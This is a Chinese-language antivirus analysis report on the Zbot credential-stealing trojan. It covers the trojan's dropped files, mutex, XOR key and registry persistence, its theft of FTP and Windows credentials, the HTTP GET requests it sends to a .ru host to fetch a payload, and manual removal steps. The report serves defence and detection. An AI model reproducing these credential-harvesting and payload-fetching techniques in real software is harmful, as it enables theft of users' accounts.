Trojan/Win32.Zbot.akas[Spy]分析

一、 病毒标签：
病毒名称： Trojan/Win32.Zbot.akas[Spy]
病毒类型： 后门
文件 MD5： 23C77C4C29158FEA0E0E805EEF535571
公开范围： 完全公开
危害等级： 4
文件长度： 232,501 字节
感染系统： Windows98以上版本
开发工具： Microsoft Visual C++ 6.0
加壳类型： UPX

二、 病毒描述：
该恶意代码文件为后门类木马，病毒运行后API函数设置隐藏内存报错窗口，创建互斥体防止多次运行，去掉对第一个节表004120FD处开始688字节的内存保护，对这段内存数据进行异或解密 ，解密完毕之后将这段内存属性改为可读可写，在系统目录下创建2个随机5个英文字母的目录，并在2个随机名目录内各衍生一个病毒文件，创建注册表项、获取系统版本信息，调用衍生的病毒EXE文件，调用CMD命令行删除自身原文件，该病毒获取Windows登陆账号信息和FTP账户信息，试图将账号发送到病毒作者远程计算机

三、 行为分析：
本地行为:
1、衍生相同文件到以下目录分别命名为
%Documents and Settings%\当前用户\Application Data\Byyn\bifo.exe  （随机名）
%Documents and Settings%\当前用户\Application Data\Tuybva\kyhif.tmp （随机名）
%Documents and Settings%\当前用户\Application Data\Tuybva\kyhif.ifl （随机名）

2、病毒运行后API函数设置隐藏内存报错窗口，创建互斥体MutexName = "Global\{FD0D3DE9-967C-0BBF-F2E4-201E41102BA0}"防止多次运行，去掉对第一个节表004120FD处开始688字节的内存保护，对这段内存数据进行异或解密密钥为6F 14 7D F3 4个字节，遍历磁盘目录%Documents and Settings%\All Users\Application Data查找"*flashfxp*"目录，找到之后试图获取FTP的 IP port USER PASS等账户信息，遍历%Windir%目录下是否有wcx_ftp.ini文件如果有则读取该文件内的connections default host username password等信息，读取ftplist.txt文件;server= ;port=  ;user= ;password=等变量账户信息，另外还读取多个FTP软件的配置文件账户信息，试图修改火狐浏览器的profiles.ini、user.js等文件，将获取的FTP账户信息和Windows登陆账号信息以POST方式发送到病毒作者地址中。

3、添加注册表启动项
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{85A601B1-AA24-7314-F2E4-201E41102BA0}
值: 字符串: ""C:\Documents and Settings\a\Application Data\Byyn\bifo.exe""

网络行为:
连接以下URL获取数据：
GET /?HOST=phaizeipeu.ru&R=/bin/huegh***.bin& HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Cache-Control: no-cache
Host: phaizei***.ru:8080  （该网址已失效）

GET /bin/huegh***.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: phaizeipeu.ru
Cache-Control: no-cache  （该网址已失效）

注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
        %Windir% 　　　　　 　　　　　  WINDODWS所在目录
　　　　%DriveLetter%　 　　　　　　　   逻辑驱动器根目录
　　　　%ProgramFiles%　 　 　　　　　  系统程序默认安装目录
　　　　%HomeDrive% 　　　　　　　　　 当前启动的系统的所在分区
　　　　%Documents and Settings% 　　　   当前用户文档根目录
　　　　%Temp% 　　　　　　　　　　　　\Documents and Settings
　　　　　　　　　　　　 　　　　　　　  \当前用户\Local Settings\Temp
　　　　%System32% 　　　　　　　　　　 系统的 System32文件夹
　　　　
　　　　Windows2000/NT中默认的安装路径是C:\Winnt\System32
　　　　windows95/98/me中默认的安装路径是C:\Windows\System
　　　　windowsXP中默认的安装路径是C:\Windows\System32　　　


四、 清除方案：
1、使用安天木马防线可彻底清除此病毒(推荐)。
请到安天网站下载：http://www.antiy.com
2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
（1） 使用ATOOL“进程管理”关闭病毒相关进程
（2） 强行删除病毒文件
%Documents and Settings%\当前用户\Application Data\Byyn\bifo.exe  （随机名）
%Documents and Settings%\当前用户\Application Data\Tuybva\kyhif.tmp （随机名）
%Documents and Settings%\当前用户\Application Data\Tuybva\kyhif.ifl （随机名）
（3）  恢复病毒修改的注册表
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{85A601B1-AA24-7314-F2E4-201E41102BA0}
值: 字符串: ""C:\Documents and Settings\a\Application Data\Byyn\bifo.exe""